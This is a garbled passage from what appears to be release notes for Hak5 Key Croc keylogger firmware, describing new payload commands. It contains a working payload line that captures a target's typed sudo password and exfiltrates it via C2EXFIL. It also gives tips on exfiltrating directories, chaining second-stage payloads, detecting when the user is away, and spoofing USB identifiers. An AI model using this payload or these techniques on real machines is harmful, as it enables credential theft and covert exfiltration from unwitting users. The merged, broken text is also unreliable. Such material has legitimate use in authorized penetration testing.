SAVEKEYScommand. Coupled with
MATCH, which tells a payload when to trigger, it lets you save either a set amount of keys that were typed before or after the payload is triggered. Now, in addition to the
UNTIL. As the name states, this allows you to save keys to a file
UNTILa specified value is typed. That value can be a simple string or single key, or an entire regular expression!
MATCH sudoSAVEKEYS /root/loot/password.txt UNTIL \[ENTER\](.*?)\[ENTER\]WAIT_FOR_LOOT /root/loot/sudo-pass.txtC2EXFIL STRING /root/loot/sudo-pass.txt.filtered PASSWDC2NOTIFY INFO 'Captured Target Sudo Password'
sudo". Then it saves the keys typed to the password.txt file until the
ENTERkey is pressed twice. Magic!
ARMING_PASSin your config.txt. Likewise if you'd like to set a window of time in which the button must be pressed after the password is typed, add
ARMING_TIMEOUT. Thanks for the contribution 0xDade!
QFILE) – with this you specify a separate text file containing Ducky Script that 1. doesn't need each command prefixed with
QUACKand 2. doesn't require any bash special character escaping! Perfect for large blocks of text, and adding support out of the box for so many of the existing payloads for the USB Rubber Ducky!
DISABLE_PAYLOADnow let you either enable or disable a payload systematically from within your payload. For example, if you only want a payload to run once, after you've ensured that the desired loot has been obtained you can issue
DISABLE_PAYLOADfile-name.txt followed by
RELOAD_PAYLOADSand it won't run again.
ENABLE_PAYLOADfile-name.txt followed by
RELOAD_PAYLOADScommands to have your first stage activate a second stage!
WAIT_FOR_KEYBOARD_INACTIVITYare new commands that let you know if the human operator is present, or likely AFK. You can specify a timeout and optional interval.
WAIT_FOR_KEYBOARD_INACTIVITYyou can ensure that after a payload has triggered, it doesn't continue until a set amount of time has elapsed since there was any keyboard activity.
WAIT_FOR_KEYBOARD_ACTIVITYcan be used to pause a payload that's triggered until the human operator starts typing.
WAIT_FOR_LOOT. This new command will pause the payload from continuing until the specified file has been created. What if you're appending to an existing file? In that case you can specify an interval in seconds after the file name, and the payload will pause until the loot file stops growing in size. Perfect for exfiltrations! Pro tip: When exfiltrating a large directory of files, set your payload to
WAIT_FOR_LOOT done.txt. Then in your exfiltration script, make sure that when your copy command has completed, you create new file called "
PIDwith the same
ATTACKMODEformat from your
config.txt. Now the Serial Number (
SN_xxxx), Manufacturer (
MAN_xxxx) – which have always been available to set from the
ATTACKMODEcommand – can be specified from
MAN MAN_Hak5PROD PROD_KeyCrocSN SN_1337
RNDIS_ETHERNETfor Windows targets, or
ECM_ETHERNETfor Linux/Mac targets (or my favorite,
AUTO_ETHERNETwhich will try both).
GET_VARSin your payload and it'll export a plethora of variables. One of my favorites is
$TARGET_HOSTNAME, which would be the name of the computer - perfect for naming loot files.
GET_HELPERScommand from a shell on the Key Croc.